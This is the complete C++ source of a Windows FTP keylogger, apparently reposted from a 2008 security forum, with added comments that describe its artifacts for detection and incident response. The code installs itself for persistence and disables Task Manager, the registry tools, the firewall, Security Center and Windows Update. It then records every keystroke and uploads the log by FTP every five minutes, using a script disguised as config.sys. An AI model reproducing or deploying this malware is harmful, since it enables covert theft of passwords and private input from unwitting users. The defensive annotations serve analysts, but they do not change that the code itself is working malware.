FTP Keylogger

Code:
/////////////////////////////////////////////////////////////////
// R00TSECURITY.ORG - YOUR SECURITY COMMUNITY
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// [2008-07-15] FTP Keylogger
// - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
// GENERATED ON: 2008-08-10 | 15:48:36
/////////////////////////////////////////////////////////////////


SOURCE CODE
#include
#include
#include
#include
using namespace std;

// Name of the batch file that OpenBatFile() launches on a timer. It is a bare
// file name, not an absolute path; main() writes a file with the same name
// under C:\WINDOWS\system32 (presumably the one intended here).
char BatchFile[20] = "system.bat";
// Passed as the lpParameters argument of the two ShellExecute calls in main().
// Nothing in this listing assigns it, so it remains a null pointer.
char* params;

// Thread routine started from main() through CreateThread. It never returns:
// every 300000 ms (five minutes) it opens BatchFile ("system.bat") with a
// hidden window. The system.bat that main() writes runs ftp with a script that
// sends log.txt, so this loop is what triggers the periodic upload.
// Analyst note: the observable pattern is a recurring, roughly five-minute
// launch of a batch file followed by ftp with "-n -i -s:<script>", originating
// from a process that was registered under a Run key.
DWORD WINAPI OpenBatFile(LPVOID)
{
      // Endless loop: no exit condition, and the ShellExecute result is ignored.
      for(;;) {
Sleep(300000);
ShellExecute(NULL, "open", BatchFile, NULL, NULL, SW_HIDE);}
}


// Translates one virtual-key code into the text that main() appends to the
// capture file. Returns an empty string for any code that no branch handles.
// Analyst note: this table defines the format of a recovered log.txt:
// bracketed tags such as "[SHIFT]" or "[TABULATOR]" mixed with literal
// characters, and one newline for each Enter press.
std::string GetKey(int Key)
{
    std::string KeyString = "";

    // Code 8 is the Backspace key; the log tag it produces reads "[delete]".
    if (Key == 8)
        KeyString = "[delete]";
    // Code 13 (Enter) is written as a line break.
    else if (Key == 13)
        KeyString = "\n";
    // Code 32 (space bar).
    else if (Key == 32)
        KeyString = " ";
    else if (Key == VK_PAUSE)
        KeyString = "[PAUSE]";
    else if (Key == VK_CAPITAL)
        KeyString = "[CAPITAL]";
    else if (Key == VK_SHIFT)
        KeyString = "[SHIFT]";
    else if (Key == VK_TAB)
        KeyString = "[TABULATOR]";
    else if (Key == VK_CONTROL)
        KeyString = "[CTRL]";
    else if (Key == VK_ESCAPE)
        KeyString = "[ESCAPE]";
    else if (Key == VK_END)
        KeyString = "[END]";
    else if (Key == VK_HOME)
        KeyString = "[HOME]";
    else if (Key == VK_LEFT)
        KeyString = "[LEFT]";
    else if (Key == VK_RIGHT)
        KeyString = "[RIGHT]";
    else if (Key == VK_UP)
        KeyString = "[UP]";
    else if (Key == VK_DOWN)
        KeyString = "[DOWN]";
    else if (Key == VK_SNAPSHOT)
        KeyString = "[SNAPSHOT]";
    else if (Key == VK_NUMLOCK)
        KeyString = "[NUMLOCK]";
    // Codes 190 and 110 (main-block period and numeric-keypad decimal).
    else if (Key == 190 || Key == 110)
        KeyString = ".";
  
    // Codes 96..105 are the numeric-keypad digits; subtracting 48 yields the
    // character codes 48..57, and the integer is stored as a single character.
    else if (Key >=96 && Key <= 105)
        KeyString = Key-48;
    // Codes 48..59 are stored as the character with the same value.
    else if (Key > 47 && Key < 60)
        KeyString = Key;
    // This condition holds for every value of Key (no value equals both
    // constants), so the block below is always evaluated.
    if (Key != VK_LBUTTON || Key != VK_RBUTTON)
    {
        // Codes 65..90 are the letter keys A..Z.
        if (Key > 64 && Key < 91)
        {
            // Upper case is written when GetKeyState(VK_CAPITAL) is non-zero;
            // otherwise 32 is added to obtain the lower-case character.
            if (GetKeyState(VK_CAPITAL))
                KeyString = Key;
            else
            {
                Key = Key + 32;
                KeyString = Key;
            }
        }
    }

    return KeyString;
}

// Entry point. In order: copies the running executable into the system
// directory, registers it for start-up, weakens several security controls,
// drops four helper files, starts the upload thread and then polls the
// keyboard forever. The comments below record the artifacts each step leaves
// behind, for detection and incident response.
// Mitigation note: the writes under the system directory and under
// HKEY_LOCAL_MACHINE normally require administrative rights, so the sample
// depends on being run from an elevated account.
int main()
{
    // Block-scope declaration of a WinMain function. It only declares the
    // name; nothing in this listing defines or calls it.
    int WINAPI WinMain (HINSTANCE hThisInstance,
    HINSTANCE hPrevInstance,
    LPSTR lpszArgument,
    int nFunsterStil);
    
  // --- Self-copy -----------------------------------------------------------
  // Artifact: <system directory>\borg.exe, a copy of the running image.
  // CopyFile is called with bFailIfExists == false, so an existing file is
  // overwritten. No return value in this section is checked.
  char path[MAX_PATH];
  HMODULE GetModH = GetModuleHandle(NULL);
    
  char sys[MAX_PATH];
  GetModuleFileName(GetModH, path, sizeof(path));
  GetSystemDirectory(sys, sizeof(sys));
  strcat(sys, "\\borg.exe");
  CopyFile(path, sys, false);
    
  HKEY hKey, hKey2;
  
  // Two-byte buffer: the character '0' followed by a terminating NUL.
  unsigned char reg[2] = "0";
  
  // --- Registry changes ----------------------------------------------------
  // Artifact 1: HKLM\Software\Microsoft\Windows\CurrentVersion\Run, value
  // "MS-Windows-secretly" (REG_SZ) pointing at the borg.exe copy. The data
  // length passed is sizeof(sys), i.e. the whole MAX_PATH buffer rather than
  // the string length.
  // Artifact 2: HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System,
  // value "DisableTaskMgr", typed REG_DWORD, with the two bytes of reg as data.
  // hKey is used without checking that RegOpenKeyEx succeeded.
  RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
  RegSetValueEx(hKey, "MS-Windows-secretly", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));
  RegCreateKey(HKEY_CURRENT_USER,"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hKey2);
  RegSetValueEx(hKey2,"DisableTaskMgr",0,REG_DWORD,reg,sizeof(reg));
  // Comma expression: only hKey is passed to RegCloseKey; (hKey2) is
  // evaluated and discarded, so that handle is not closed here.
  RegCloseKey(hKey),(hKey2);

  // Removes any capture file left by an earlier run.
  DeleteFile("C:\\WINDOWS\\system32\\log.txt");  
    
  // --- Dropped file: C:\WINDOWS\system32\update.bat ------------------------
  // Adjacent string literals are concatenated by the compiler, so the ""
  // pairs below contribute no quote characters to the text written to disk.
  // As written, the script stops the Security Center and SharedAccess
  // services, builds %Temp%.\kill.reg setting Start=dword:00000004 for the
  // SharedAccess, wuauserv and wscsvc service keys, imports it silently with
  // REGEDIT /S, then deletes kill.reg and itself (DEL %0).
  // Analyst note: look for service Start values changed to 4 and for
  // "REGEDIT /S" run against a .reg file in the temp location.
  ofstream FWUP;
  FWUP.open("C:\\WINDOWS\\system32\\update.bat");
  FWUP<<"@echo off\n";
  FWUP<<"net stop ""Security Center""\n";
  FWUP<<"net stop SharedAccess\n";
  FWUP<<"> ""%Temp%.\\kill.reg"" ECHO REGEDIT4\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\wuauserv]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO [HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Services\\wscsvc]\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO ""Start""=dword:00000004\n";
  FWUP<<">>""%Temp%.\\kill.reg"" ECHO.\n";
  FWUP<<"START /WAIT REGEDIT /S ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL ""%Temp%.\\kill.reg""\n";
  FWUP<<"DEL %0\n";
  FWUP.close();  
    
  // --- Dropped file: C:\WINDOWS\system32\syssvr.bat ------------------------
  // Runs "reg add" to set the per-user policy value disableregistrytools to 1
  // under the same Policies\System key as DisableTaskMgr above.
  ofstream disable;
  disable.open("C:\\WINDOWS\\system32\\syssvr.bat");
  disable<<"@echo off\n";
  disable<<"reg add ""HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System"" /v ""disableregistrytools"" /t REG_DWORD /d ""1"" /f >NUL\n";
  disable.close();  
  
  // --- Dropped file: C:\WINDOWS\system32\drivers\config.sys ----------------
  // Despite its name and location this is an ftp command script. The server,
  // user name and password in this listing are placeholders. On a real host
  // the recovered file holds the upload destination and account in clear
  // text, which makes it a primary piece of evidence for responders.
  //write ur ftp-information's here
  ofstream log;
  log.open("C:\\WINDOWS\\system32\\drivers\\config.sys");
  log<<"OPEN ftpserver\n";
  log<<"USER username\n";
  log<<"ftppassword\n";
  log<<"ASCII\n";
  log<<"SEND C:\\WINDOWS\\system32\\log.txt\n";
  log<<"BYE\n";
  log<<"exit\n";
  log.close();
  
  // --- Dropped file: C:\WINDOWS\system32\system.bat ------------------------
  // Invokes ftp with -n -i -s: pointing at the script above. Analyst note:
  // ftp started with a -s: script argument and outbound FTP traffic from a
  // workstation are both useful detection points.
  ofstream Ausgabe;
  Ausgabe.open("C:\\WINDOWS\\system32\\system.bat");
  Ausgabe<<"ftp -n -i -s:C:\\WINDOWS\\system32\\drivers\\config.sys\n";
  Ausgabe<<"bye\n";
  Ausgabe<<"exit\n";
  Ausgabe.close();
  
  // Runs the two tampering scripts with hidden windows. params is the global
  // pointer that nothing in this listing assigns.
  ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\syssvr.bat", params, NULL, SW_HIDE);
  ShellExecute(NULL, NULL, "C:\\WINDOWS\\system32\\update.bat", params, NULL, SW_HIDE);
  
  DWORD OpenBatch;
  
  // Starts the periodic upload thread (OpenBatFile). The returned handle is
  // neither checked nor closed.
  HANDLE hOpenBatFile = CreateThread(NULL, 0, OpenBatFile, 0, 0, &OpenBatch);
    
    // --- Capture loop ------------------------------------------------------
    // Artifact: C:\WINDOWS\system32\log.txt, opened in append mode.
    std::string Filename = "C:\\WINDOWS\\system32\\log.txt";
    std::string TempString = "";
    std::fstream FStream;
    FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);

    // Never terminates. Analyst note: a process with no window that calls
    // GetAsyncKeyState across a wide range of key codes at a short, fixed
    // interval is a behaviour endpoint monitoring can flag.
    while(true)
    {
        // 0% CPU
        // (the 5 ms sleep keeps the polling loop from saturating a core)
        Sleep(5);

        // Polls virtual-key codes 8 through 190 on every pass.
        for(int i = 8; i < 191; i++)
        {
           // Operator precedence makes this GetAsyncKeyState(i) & (1 == 1),
           // which tests the low-order bit of the returned state.
           if(GetAsyncKeyState(i)&1 ==1)
           {
                TempString = GetKey (i);

                // The stream is closed and reopened after each write, so the
                // file on disk grows with every recorded key.
                FStream.write(TempString.c_str(), TempString.size());
                FStream.close();
                FStream.open(Filename.c_str(), std::fstream::out | std::fstream::app);
           }
        }
    }
}
